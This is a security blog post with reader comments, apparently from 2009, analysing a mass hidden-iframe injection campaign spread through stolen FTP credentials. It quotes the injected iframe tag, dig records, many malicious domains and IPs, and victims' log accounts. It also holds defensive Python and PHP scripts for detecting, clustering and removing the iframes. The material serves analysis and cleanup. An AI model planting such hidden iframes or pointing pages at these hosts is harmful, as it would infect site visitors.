This post is a reminder that .cn iframe attacks are still among the most widespread website infections.
The URLs of the malicious iframes change over time. The hackers introduce new suffixes (campaign names?) such as mozila, banner, cocacola and pepsi, and keep adding more and more domain names.
Since the pepsi campaign they have been using port 8080 in the URLs.
The current form of the malicious code looks like this:
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages. The visibility: hidden style keeps the frame invisible to visitors, while the browser still loads whatever the remote server returns.
All those .cn domains resolve to the same IP address, or rather to the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the remaining four will still be working.
Here is the output of the dig command that shows 5 “A” records (June 22):
$ dig shopmoviefestival.cn
...
;; QUESTION SECTION:
;shopmoviefestival.cn. IN A
;; ANSWER SECTION:
shopmoviefestival.cn. 432 IN A 77 .37 .19 .173
shopmoviefestival.cn. 432 IN A 88 .191 .78 .48
shopmoviefestival.cn. 432 IN A 89 .171 .115 .10
shopmoviefestival.cn. 432 IN A 90 .156 .144 .78
shopmoviefestival.cn. 432 IN A 91 .121 .146 .101
...
This set of IP addresses changes over time as some servers become unavailable. At the moment of this article's publication (June 25) the set of A records looks like this:
[ 90 .156 .144 .78 ], [ 77 .37 .19 .179 ], [ 77 .37 .18 .36 ], [ 77 .37 .19 .43 ], [ 77 .37 .19 .173 ].
A couple of days ago I noticed similar hidden iframes with .pl domains in their URLs:
a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80
No wonder: these domains resolve to the same set of 5 IPs.
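The shared-IP observation above is the practical pivot: any new domain that resolves to the same address set belongs to the same infrastructure, whatever its TLD. The following Python script is an added example, not code from the post: it pulls the A records out of dig output, groups domains that share at least one address, and diffs two snapshots of a record set the way the June 22 and June 25 lists above differ. The dig answers embedded below are constructed for the example (the .cn/.pl addresses are the ones quoted in the post; example.org is a stand-in for an unrelated site), and the record parsing assumes dig's default tabular answer layout.

```python
import re
from collections import defaultdict

# Constructed dig(1) answers modelled on the output quoted in the post.
DIG_OUTPUTS = {
    "shopmoviefestival.cn": """
;; QUESTION SECTION:
;shopmoviefestival.cn.\t\tIN\tA

;; ANSWER SECTION:
shopmoviefestival.cn.\t432\tIN\tA\t77.37.19.173
shopmoviefestival.cn.\t432\tIN\tA\t88.191.78.48
shopmoviefestival.cn.\t432\tIN\tA\t89.171.115.10
shopmoviefestival.cn.\t432\tIN\tA\t90.156.144.78
shopmoviefestival.cn.\t432\tIN\tA\t91.121.146.101
""",
    "a3h.pl": """
;; ANSWER SECTION:
a3h.pl.\t\t300\tIN\tA\t90.156.144.78
a3h.pl.\t\t300\tIN\tA\t77.37.19.173
""",
    "example.org": """
;; ANSWER SECTION:
example.org.\t\t3600\tIN\tA\t192.0.2.1
""",
}

# The two record sets quoted in the post for the same domain, three days apart.
JUNE_22 = ["77.37.19.173", "88.191.78.48", "89.171.115.10", "90.156.144.78", "91.121.146.101"]
JUNE_25 = ["90.156.144.78", "77.37.19.179", "77.37.18.36", "77.37.19.43", "77.37.19.173"]

# One answer-section line: "name. ttl IN A a.b.c.d" (comment lines start with ';').
A_RECORD = re.compile(
    r"^(?P<name>[^;\s]+)\.\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$",
    re.M,
)


def a_records(dig_text):
    """Return the sorted, de-duplicated IPv4 addresses from dig's ANSWER SECTION."""
    return sorted({m.group("ip") for m in A_RECORD.finditer(dig_text)})


def cluster_by_ip(records):
    """records: {domain: iterable of IPs}. Group domains that share at least one IP
    (transitively) using a small union-find; returns sorted lists of domain names."""
    parent = {d: d for d in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    first_owner = {}  # ip -> first domain seen with it
    for domain, ips in records.items():
        for ip in ips:
            if ip in first_owner:
                parent[find(domain)] = find(first_owner[ip])
            else:
                first_owner[ip] = domain
    groups = defaultdict(set)
    for d in records:
        groups[find(d)].add(d)
    return sorted(sorted(g) for g in groups.values())


def diff_snapshots(old, new):
    """Which addresses stayed, appeared and disappeared between two lookups."""
    old, new = set(old), set(new)
    return {"kept": sorted(old & new), "added": sorted(new - old), "removed": sorted(old - new)}


if __name__ == "__main__":
    records = {domain: a_records(text) for domain, text in DIG_OUTPUTS.items()}
    for group in cluster_by_ip(records):
        print("same infrastructure:", ", ".join(group))
    print("change over time:", diff_snapshots(JUNE_22, JUNE_25))
```

Run it against real dig output by replacing the constructed dictionary with `subprocess.run(["dig", domain], capture_output=True, text=True).stdout` per domain; the parser only needs the answer lines. Clustering on shared addresses is deliberately transitive, so a domain that shares one IP with the .cn set and another with the .pl set still ends up in the same group.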
Update (June 29, 2009): Have found similar iframes with .ru domains in URLs: a3h .ru and a5l .ru
Update (July 8, 2009): Have found similar iframe with .at domain in URL: a3l .at
Update (July 21, 2009): Now we have .in: q3e .in and q3t .in
Here are some other domain names that you may encounter in the src attribute of those hidden iframes:
Hidden iframes are easily detected by Unmask Parasites.
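The signature described above (an iframe loading an external host, often on port 8080, hidden with visibility: hidden or tiny dimensions) is simple enough to check for yourself. The script below is an added example, not code from the post or from Unmask Parasites: it parses the HTML properly instead of grepping, flags only iframes that are both external to the site and hidden (or on a suspicious port), and removes just those, leaving legitimate embedded frames alone. The sample page is constructed for the example; the injected tag in it is the one quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SUSPICIOUS_PORTS = {8080}   # port used by this campaign since the "pepsi" wave
TINY = 10                   # width/height at or below this is effectively invisible

# Constructed sample page: one legitimate iframe, one injected hidden iframe at the bottom.
SAMPLE = """<html><body>
<p>Welcome to our shop</p>
<iframe src="http://www.youtube.com/embed/abc" width="425" height="344"></iframe>
<iframe src="http://namegamestore.cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":   # HTMLParser lowercases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dimension(value):
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """Hidden via CSS, or sized so small that nothing is visible."""
    style = attrs.get("style", "").lower().replace(" ", "")
    if "visibility:hidden" in style or "display:none" in style:
        return True
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    return (w is not None and w <= TINY) or (h is not None and h <= TINY)


def is_external(src, site_host):
    host = (urlsplit(src).hostname or "").lower()
    return bool(host) and host != site_host.lower()


def suspicious_iframes(html, site_host):
    """Return the src of every iframe that loads another host and is hidden or on a suspicious port."""
    collector = IframeCollector()
    collector.feed(html)
    found = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        if not is_external(src, site_host):
            continue
        if is_hidden(attrs) or urlsplit(src).port in SUSPICIOUS_PORTS:
            found.append(src)
    return found


# Whole element, non-greedy so two iframes on one page are not merged into one match.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.I | re.S)


def clean(html, site_host):
    """Drop only the iframes flagged by suspicious_iframes(); keep everything else byte-for-byte."""
    def drop(match):
        return "" if suspicious_iframes(match.group(0), site_host) else match.group(0)
    return IFRAME_RE.sub(drop, html)


if __name__ == "__main__":
    for src in suspicious_iframes(SAMPLE, "www.example.com"):
        print("suspicious iframe:", src)
    print(clean(SAMPLE, "www.example.com"))
```

Two caveats a practitioner should keep in mind: an injected iframe without a closing tag will be reported by `suspicious_iframes()` but not removed by `clean()`, and removing the tag does nothing about the stolen FTP credentials that put it there, so run this as a detector after the clean-up steps below, not as a substitute for them.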

You can find the clean-up instructions in my original post about the .cn iframes. They include removing malware from your local computer, changing and securing FTP passwords and finally uploading a clean copy of the website from a backup.
Finally, if your site is blacklisted by Google, request a malware review via Google Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.
As always, any comments are welcome.
Just got one of these attacks today. Such a bother to stop in the middle of work and have to start up AVG and clean up the mess. Thank god it only infected one of the websites.
Muchos Gracias for the info about clearing up the problem.
I have a theory about the use of port 8080:
http://wirewatcher.wordpress.com/2009/06/26/sidestepping-inline-url-content-filters/
Thanks. Interesting thoughts about traffic filtering.
I’ll be posting new domains names used in this attack here:
bestfilmlife .cn, mediahomenameshopmovie .cn, shopfilmlifescience .cn, bigtopbrands .cn, bigtopstats .cn, brandnameshoppin .cn, turbonamestore .cn, mixgrouptravel .cn, findyourbigwhy .cn, thebestwaytofind .cn, mybetsportswager .cn, shopvideofest .cn, martpictureexistence .cn, namezeroshop .cn, shopfilmworld .cn, litetopfindguide .cn, shoppicturelife .cn, liteautogreatest .cn, nonfathighestlocate .cn, findabigrig .cn, ultralitecar .cn, jumbobestrate .cn, solmixgroup .cn, cubanbigtop .cn, premiumnonfat .cn, newnetnameshop .cn, greatshopfilm .cn, bestmortgagefind .cn, michaelsbestway2findalawyer .cn, casinoslotbet .cn, greatbetpoker .cn, mymixwager .cn
a3j .pl
39j .ru, 39q .ru, 39t .ru, 39w .ru, 39y .ru, 3a2 .ru, 3b6 .ru, 3b8 .ru, 3bf .ru, 3bp .ru, 3bq .ru, 3c9 .ru, 3cf .ru, 3cw .ru, 3e0 .ru, 3f2 .ru, 3f8 .ru, 3f9 .ru,
a3j .ru, a3l .ru, a3q .ru, a3t .ru, a5m .ru, a5f .ru, a5h .ru, a5g .ru, a5i .ru, a5j .ru,
b1a .ru, b3a .ru, b5c .ru, b5z .ru, b7g .ru, b7p .ru, b8e .ru,
c1z .ru, c3q .ru, c5p .ru, c5y .ru, c6y .ru, c7h .ru,
q0a .ru, q0c .ru, q0l .ru, q1b .ru, q1k .ru, q1m .ru, q1u .ru, q3s .ru, q40 .ru, q41 .ru, q5a .ru, q5c .ru, q5l .ru, q5m .ru, q5u .ru, q5v .ru,
u0c .ru, u0s .ru, u0t .ru, u1a .ru, u1b .ru, u1l .ru, u1w .ru, u3w .ru, u5c .ru, u5d .ru, u5l .ru, u5w .ru, u6b .ru, u6c .ru, u6k .ru, u6l .ru, u7e .ru, u7g .ru, u7o .ru, u7z .ru, u8r .ru, u9a .ru, u9b .ru, u9i .ru
x3y .ru, x5o .ru, x6i .ru, x7o .ru, x8c .ru, x8e .ru, x8m .ru, x8n .ru, x8o .ru, x8v .ru, x9o .ru, x9v .ru, x9w .ru, x9y .ru, xf0 .ru, xf8 .ru, xi3 .ru, xj5 .ru, xq9 .ru, xv9 .ru
6w2 .ru
q1n .in, q1x .in, q5n .in, q5y .in,
u0r .in, u19 .in, u1j .in, u3h .in
x0a .in, x1g .in, x3v .in, x6p .in, x0q .in, x7b .in, x8l .in, x8u .in, x9d .in, xb4 .in, xc6 .in, xh9 .in, xg8 .in, xt6 .in,
bqtl .in, gqil .in, oufc .in, soac .in
b6l .at, b9g .at, c1z .at, c6y .at, f5l .at, f7p .at,
sexfinish .ru, red-wolf .ru, xuiligan .ru, bogoxulstvo .ru, pornishe .ru, sexsila .ru, past-another-life .ru, some-other-life .ru, theanotherlife .ru, last-another-life .ru, oneanotherlife .ru, previous-life .ru, life-before .ru, formerlife .ru, bestage .ru, agebee .ru, age-free .ru, inother .ru, age-free .ru, biozavr .ru, bio-tube .ru, yourbio .ru, youbio .ru, bio-age .ru, beo-free .ru, sexsila .ru, 18-plus .ru, age-t .ru, icq-mobila .ru, telicq .ru, ageend .ru, ageegle .ru, age-inf .ru, ageinf .ru, ageee .ru, what-is-your-iq .ru, lifoon .ru, offiget .ru, sexfinish .ru, test-medicine .ru, your-great-mind .ru, on-liffe .ru, realnisex .ru, kasnis .ru, bitest .ru, pornovoina .ru, bigargazm .ru, 911test .ru, riday .ru, ridai .ru, xxxtaina .ru, bruzg .ru, traxnolog .ru, theprevious .ru, the-previous-life .ru, deathtesting .ru, the-past .ru, doxyia .ru, onelifebefore .ru, before-this-life .ru, onetherlife .ru, bestbeo .ru, soul-of-man .ru, soulinyou .ru, privius-life .ru, former-life .ru, bestbio .ru, bionaft .ru, testbio .ru, hochesh-li .ru, before-life .ru, biovoz .ru, life-death-test .ru, moya-podruga .ru, agefree .ru, b-i-o-v .ru, age-ega .ru, bio-v .ru, bio-vozrast .ru, check-your-iq .ru, age-t .ru, t-age .ru, bio-a .ru, icq-tel .ru, soulinyou .ru, styleicq .ru, samsungicq .ru, nokiaicq .ru, qiiiq .ru, iqste .ru, age-age .ru, dedlife .ru
I can add some more, too:
bigtopmanagement .cn
lotwager .cn
And possibly also related:
mialo-goodle dot info / cn.php ? mkx
…although that last one doesn’t resolve at the moment.
I’m monitoring a site with a .cn:8080 defacement. This has now changed to:
hxxp: / / b1a dot ru : 8080 / index dot php
Hi, I work for a hosting company and we’re seeing so many of these attacks. Driving me insane, but thanks for the blog, it’s helped me keep on top of this mess.
Hi Ivy,
Have you worked out how the bad guys are getting in? Via stolen FTP/ssh credentials?
alec
Hello friends,
As I was also facing the same problem, but after changing my FTP password I solved the problem. So try to change your FTP password and enjoy.
Regards,
Balmukund Gohil
Web Designer
9819889092.
We got hit too, right at the end of June. They injected their iframe code, exactly like that posted above but with the bigtopbrands domain and slightly different dimensions, right after the body tag in every file with “index”, “home”, or “main” in the name. This resulted in a gap of a hundred or so pixels at the top of each affected page when viewed in a browser, so fortunately I could see something was wrong right away and get it fixed. Also, the last couple lines of each modified page were missing.
I found the attack in our logs, and as near as I can tell, here’s what happened.
They logged in using our FTP credentials. (We are guessing they got them by using an exploit in Adobe Reader v8.) They downloaded one file, index.htm, and then logged out. This took a total of three seconds from connection to logout.
Three seconds after they logged out, they logged back in from a completely different IP, uploaded the modified version of the file they’d just downloaded, and logged back out. Again, this took just three seconds to do.
Five seconds later, they logged back in from yet another IP and downloaded another index file (I have one in each subdirectory). In a total of five seconds, they had it and logged out.
Three seconds later, a fourth IP logged in and uploaded that index file with their code added, then logged out.
This cycle repeated until they had injected their code into all the targeted files on my entire site, including a forum (which their code or the missing last lines broke, another big clue something was amiss).
Out of 208 total logins, only 17 IPs were used twice, and only one was used 3 times. All the rest were unique. They resolve to countries all over the world: India, Nepal, Hong Kong, Argentina, the U.S., Australia, Canada, Japan, Hungary, and Brazil, to name just a random few.
The entire attack took just over an hour, so if you have a lot of index-type files like I do and happen to catch them in the act, changing your FTP password should stop them (then immediately follow the posted clean-up instructions), but blocking IPs won't affect them for even a moment; there are just too many.
Thanks for the post. It gave me some great insight into exactly what happened to us and how.
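The pattern Mac describes is a clean detection signature: each targeted file is downloaded by one IP and re-uploaded seconds later, slightly larger, by a different IP. The script below is an added example, not code from the post or from any commenter: it parses FTP transfer logs, pairs every download with the next upload of the same path inside a short window, and summarises how many distinct IPs took part. The log lines are constructed for the example and assume the classic xferlog layout (date, transfer time, remote host, size, path, type, action flag, direction with o for download and i for upload, mode, user, ...); adjust the field indices if your FTP daemon logs differently.

```python
from collections import defaultdict
from datetime import datetime

# Constructed xferlog-style lines: two download/upload swaps a few seconds apart
# from four different IPs, plus one ordinary upload that must not be flagged.
SAMPLE_LOG = """\
Tue Jun 30 02:11:03 2009 1 198.51.100.7 4123 /home/acme/public_html/index.htm b _ o r acme ftp 0 * c
Tue Jun 30 02:11:09 2009 1 203.0.113.44 4310 /home/acme/public_html/index.htm b _ i r acme ftp 0 * c
Tue Jun 30 02:11:14 2009 1 192.0.2.88 2980 /home/acme/public_html/shop/index.php b _ o r acme ftp 0 * c
Tue Jun 30 02:11:17 2009 1 198.51.100.201 3167 /home/acme/public_html/shop/index.php b _ i r acme ftp 0 * c
Tue Jun 30 09:40:21 2009 3 192.0.2.10 15400 /home/acme/public_html/images/logo.png b _ i r acme ftp 0 * c
"""


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines that do not have the 18 expected fields are skipped
    (note: a path containing spaces would also be skipped by this simple split)."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 18:
            continue
        when = datetime.strptime(" ".join(fields[0:5]), "%a %b %d %H:%M:%S %Y")
        entries.append({
            "time": when,
            "ip": fields[6],
            "size": int(fields[7]),
            "path": fields[8],
            "direction": fields[11],   # 'o' = client downloaded, 'i' = client uploaded
            "user": fields[13],
        })
    return entries


def find_swap_pairs(entries, window_seconds=60):
    """For each download, find the next upload of the same path within the window
    and record whether the IP changed and how much the file grew."""
    by_path = defaultdict(list)
    for entry in sorted(entries, key=lambda e: e["time"]):
        by_path[entry["path"]].append(entry)
    hits = []
    for path, events in by_path.items():
        for i, download in enumerate(events):
            if download["direction"] != "o":
                continue
            for upload in events[i + 1:]:
                delta = (upload["time"] - download["time"]).total_seconds()
                if delta > window_seconds:
                    break
                if upload["direction"] == "i":
                    hits.append({
                        "path": path,
                        "seconds": delta,
                        "download_ip": download["ip"],
                        "upload_ip": upload["ip"],
                        "ip_changed": upload["ip"] != download["ip"],
                        "size_delta": upload["size"] - download["size"],
                    })
                    break
    return hits


def summarize(hits):
    """Counts that distinguish a distributed injection run from a single admin editing a page."""
    ips = {h["download_ip"] for h in hits} | {h["upload_ip"] for h in hits}
    return {
        "pairs": len(hits),
        "distinct_ips": len(ips),
        "ip_changed": sum(1 for h in hits if h["ip_changed"]),
        "all_grew": all(h["size_delta"] > 0 for h in hits),
    }


if __name__ == "__main__":
    hits = find_swap_pairs(parse_xferlog(SAMPLE_LOG))
    for h in hits:
        print(f'{h["path"]}: down from {h["download_ip"]}, up from {h["upload_ip"]} '
              f'{h["seconds"]:.0f}s later, +{h["size_delta"]} bytes')
    print(summarize(hits))
```

A single webmaster editing index.htm produces the same download/upload pair, but from one IP and usually minutes apart; a run where nearly every pair changes IP and every file grows by about the same number of bytes (the length of the injected tag) is the distributed pattern described above and is worth an immediate password change.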
Hi Mac,
Thanks for sharing this info. This is a great description of a distributed attack.
Hi Mac,
I gave the change-your-FTP-credentials advice to a customer, but it didn’t stop the defacements.
Here’s why:
The customer’s local machine had password-stealing malware on it that was uploading his FileZilla settings. He would change the FTP password on the server, and then change it in FileZilla. Soon after he did that, the new FileZilla passwords got uploaded, and his site was defaced again!
Take care if you’re using FileZilla, and don’t use it to store your passwords!
alec
Wow, that's bad news. FileZilla is like one of the best FTP programs to use. Is FileZilla doing something to prevent this from happening?
I posted my experience as well, but so far I have not been helped yet, I’m not sure if my PCs are cleaned yet so I dare not change anything on my FTP Program yet.. I just asked my hosting guy to change my password for me
Here’s my post
http://forum.lowyat.net/index.php?act=ST&f=25&t=1091018&st=0#entry27188734
I'm not sure how the malware steals FTP credentials. In case it extracts them from program configuration files, you can try not to save passwords inside your FTP client. Just type them in every time you connect to your server.
Another option is to create an alias for your site domain in the “hosts” file and use this alias in FTP program settings. This alias will be useless if used from another computer.
FileZilla also has a Public Key Authentication option (I didn’t try it though)
The most interesting thing is that the guys who were defacing the website seem to know the guys who had the password-stealer on my customer’s PC. They may even be one-and-the-same party, although that could be tricky to prove.
alec
Hi Denis,
In this specific instance, LDPinch was responsible:
http://www.viruslist.com/en/viruses/encyclopedia?virusid=147349
I actually saw the FileZilla usernames/passwords get uploaded to Hacker HQ (along with a load of other stuff). The article above says that the upload is made via SMTP, but this time it was via an HTTP POST request to a .cn domain hosted in Ukraine.
Quite scary, really!
alec
Alec,
Great link to the viruslist. It explains how malware steals passwords. Why sniff traffic or intercept keystrokes (this activity can be easily detected by antivirus tools) when you can simply read everything from disk, where FTP programs store users' credentials in plain text?
Just got one of these attacks today. My domain is [dot]com[dot]ar (Argentina). Every index.htm and index.php has the iframe. I'm working with Joomla 1.5, if this helps someone.
I guess I'll reinstall the whole e-commerce site.
Three more:
shopmovieproduction .cn
b7p .ru
nyfilmlife .cn
“to err is human”
Was only two more :) b7p .ru was already listed :)
I found “q38 .ru” appearing in http://www .tresearchexpo.nrct .go .th (a Thailand gov’t web site) via Unmask Parasites. This must be a malicious URL.
It really is. Good find!
A client of mine was also targeted. Addresses used:
06-07-2009 >> u1w .ru
08/07/2009 >> u8r .ru
10-07-2009 >> update .cn
12-07-2009 >> u9j .ru
24-07-2009 >> xe5 .in
My client is on holiday, so I can't change the FTP password. Because I have to clean the site every other day, I wrote a script that does that for me. By calling the script every hour with a cron job, the site stays clean until she comes back.
Here's the script. I hope it's useful for other people.
(Make sure to back up your site before using this one.)
<?php
// Recursively scan the site for the index-type files this attack targets on Joomla
// sites, strip injected <iframe> elements from them and report what was removed.
// Note: it removes EVERY iframe in those files, legitimate ones included.
$path = ".";  // scan relative to the directory the script is run from
$targets = array('index.php', 'index2.php', 'index3.php', 'mainbody.php', 'index.html');

foreach ($targets as $filename) {
    list_dir($path, $filename);
}

function list_dir($path, $filename)
{
    $dir_handle = @opendir($path) or die("unable to open $path");
    while (false !== ($file = readdir($dir_handle))) {
        if ($file == '.' || $file == '..') {
            continue;
        }
        $entry = $path . '/' . $file;
        if (is_dir($entry)) {
            list_dir($entry, $filename);      // descend into subdirectories
        } elseif ($file === $filename) {
            clean_file($entry);
        }
    }
    closedir($dir_handle);
}

function clean_file($file)
{
    $html = file_get_contents($file);
    if ($html === false) {
        return;
    }
    // Match whole <iframe ...>...</iframe> elements; non-greedy so that two
    // iframes on one page are not merged (with everything between them) into one match.
    $pattern = '#<iframe[^>]*>.*?</iframe>#is';
    if (!preg_match_all($pattern, $html, $matches)) {
        return;                               // nothing injected in this file
    }
    foreach ($matches[0] as $iframe) {
        echo "\n$file " . htmlspecialchars($iframe);   // escape so the tag is shown as text
    }
    $cleaned = preg_replace($pattern, '', $html);
    $out = fopen($file, 'w') or die("unable to open file $file");
    fwrite($out, $cleaned);
    fclose($out);
    echo ' (cleaned)';
}
?>
Dear Denis,
Could you explain how this spyware could harm our computer? Where should(n't) we click to avoid the infection?
Thanks!
A few more URLs for you:
http ://q3c .ru:8080/index.php
http ://q1e .ru:8080/index.php
http ://x8o .ru:8080/ts/in.cgi?pepsi114
We had almost every index.html, index.php and several other files infected with these iframes on our server.
Found another on one of my clients’ sites:
http ://b9g .at:8080/index.php
I got infected with http ://some-other-life .ru:8080/index.php. Good thing I have a backup of the files on my WordPress blog and was able to restore it. The problem is that the attack may reoccur. Damn.
To prevent reinfections you should remove malware from your computer, change FTP passwords and keep them secure.
You might want to read this post about how the malware works and why you shouldn’t save passwords in FTP clients.
Oh no, I'm being attacked again, help.
I don't know if the problem attacking one of the servers that I visit is this particular problem, but when my browser popped up with a warning and a Google Safe Browsing report, one of the links that was apparently hosting malware was visaforchina .co .uk
[...] also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from configuration files of 10 popular FTP [...]